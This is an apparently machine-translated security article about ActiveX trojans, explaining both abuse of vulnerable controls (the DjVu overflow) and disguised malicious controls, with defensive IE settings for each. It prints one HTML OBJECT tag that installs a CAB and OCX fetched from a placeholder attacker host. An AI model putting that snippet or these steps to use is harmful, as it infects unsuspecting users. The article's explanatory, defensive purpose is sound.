Analysis of ActiveX Trojans: intrusion in the name of Installation

Once upon a time, the use of ActiveX was one of the main technical techniques of rogue software. Nowadays, most rogue software has become obsolete. However, ActiveX has not left people's field of view, and web pages are immediately mounted to it.ActiveX TrojansIt has become one of the most popular Trojan-mounting methods.

North Shore team Zhang guiling: Senior Security Engineer, engaged in the security industry for more than 10 years. ActiveX is developed by Microsoft. Microsoft programmers seem to think the world too well and think that no one will use ActiveX to do evil. During the time when malware became popular, a website named "XX baby video chat room" used color lure to entice users to install ActiveX video chat controls on the website. This ActiveX control will not only actively track the user's network information, but also pop-up advertisements, upload user Word documents and other rogue behaviors. When more and more rogue software using ActiveX, Microsoft reluctantly added ActiveX authentication measures in IE7. Today, all ActiveX tools are blocked in IE7, instead of opening the installation window as before.

Encyclopedia: ActiveX is Microsoft's name for a series of strategic object-oriented program technologies and tools. ActiveX controls must be installed during use.

　　Who holds ActiveX Trojans?

During the years when rogue software grew wild, rogue software, like thieves and bandits, often competed for important positions in users' computers, so many technologies used to create viruses are applied to these rogue software. Later, the virus began to learn from the rogue software, and some techniques used by the rogue software were also used by viruses. ActiveX Trojans should be the most thorough technology learned from the rogue software.

Encyclopedia: Many browsers are not as active as IE in support of ActiveX. Although Firefox, Netscape, and other browsers support ActiveX to varying degrees, the most serious problems with ActiveX are IE.

ActiveX will be used by Trojans. The main problem is its authentication mechanism. In the early days, if a website has something that requires ActiveX to be installed, the related ActiveX prompts repeatedly asking you to install it when you visit the website, many users often click "OK" for various reasons to allow ActiveX control installation.

This is just like walking on the road, a group of people say they are willing to make friends with you. These people walk in front of you one by one. You can choose to nod your head and agree or shake your head to deny, anyone who agrees with your nod can become your friends and they can freely enter your home. What's frightening is that some people become friends before you discover that they are thieves or rogue hooligans.

Currently, ActiveX Trojans are mainly used in two forms. One is to use ActiveX Vulnerabilities of Normal programs to overflow Trojans, and the other is to directly write malicious ActiveX Trojans, disguise a malicious trojan program as an ActiveX control that seems to have a certain function and cheat users in installing the program. In the following case, we will demonstrate how hackers can use ActiveX to mount Trojans.

　　ActiveX Trojan Attack and Defense recording

　　Method 1: Trojan Infection through Vulnerabilities

　　Attack
Hackers Use ActiveX to drive webpage Trojans. The most common method is to use ActiveX controls with vulnerabilities to drive Trojans and trigger them through existing ActiveX controls in the user system, this allows Trojans to be embedded into users' computers without knowing them.

Among them, the famous examples of attacks by using software ActiveX Vulnerabilities include Flash and RealPlayer ActiveX and trojan programs. These software ActiveX Vulnerabilities have caused great harm, in particular, there are still hackers in RealPlayer using its ActiveX Vulnerability to launch Trojans.

The following uses the DjVu ActiveX Control Vulnerability as an example to describe how to mount a trojan. First, enter malicious code into the WordPad and save it as an arbitrary HTML file, then, the IFRAME code is used to embed the generated HTML file into a normal webpage. Enter the URL to open the webpage containing the DjVu ActiveX Control Vulnerability, and the local calculator program will be triggered. Hackers are usually not so kind. They modify the Shellcode code to download the code of the specified malicious program, and then ask the user to seek help after opening the relevant website.

Encyclopedia: The DjVu ActiveX control is a tool used to compress graphical files. It overflows when processing ultra-long ImageURL attribute parameters.

　　Defense
The best way to prevent Trojans by exploiting ActiveX Vulnerabilities is to use browsers other than IE, such as Firefox, Maxthon, or 360 security browsers. In addition, it is best to install anti-trojan software.

　　Method 2: Compile ActiveX Trojan

　　Attack
ActiveX Trojans are spread by using the habit of blindly clicking the ActiveX inquiry installation button on the webpage. Many users often cannot tell which ActiveX controls are harmless and which ActiveX controls are harmful.

Those ActiveX Trojans will be tempted by the guise of video chats, beautiful image libraries, and other temptations. Some users who cannot resist the temptation will install ActiveX trojans on the webpage.

Compiling ActiveX Trojans requires a certain degree of programming Foundation, and the entire process is quite complicated. Due to layout reasons, here, I will briefly describe the compilation process of ActiveX Trojans to my friends who want to become security engineers.

First, the hacker will write an OCX control with Download or other malicious functions. This is the core and soul of the ActiveX Trojan, and then the hacker will write a Setup security setting INF file, use a CAB compression tool, such as WinCAB, to compress two files into a CAB file.

Finally, the hacker uploads the file to his website, and writes the code calling the installation ActiveX Control on the webpage to open the user waiting to browse the webpage.

The call code is as follows:

<OBJECT classid = clsid: 68ADAF59-76C1-4561-A45A-867F43545237 CodeBase = http: // 192.168.1.1/web/setup. cab # version =,> <Param name = "Setup" VALUE = "http: // 192.168.1.1/web/download. ocx"> </OBJECT>

Such ActiveX trojans do not have signature verification and are generally not allowed to be installed, but there are still ways to break through these security restrictions.

　　Defense
To avoid ActiveX Trojan attacks, you only need to prevent ActiveX trojan from being called and running.

The best way to prevent Trojans in this way is to operate on the client terminal. Run IE browser on the client terminal and click "Tools> Internet Options> Security> Custom Level ", define the security level as "high". Set "Disable" for "2nd items" and "3rd items" in "ActiveX controls and plug-ins", and "prompt" for other items ", click "OK ". After this setting, you can effectively avoid ActiveX Trojan attacks when using IE to browse Web pages.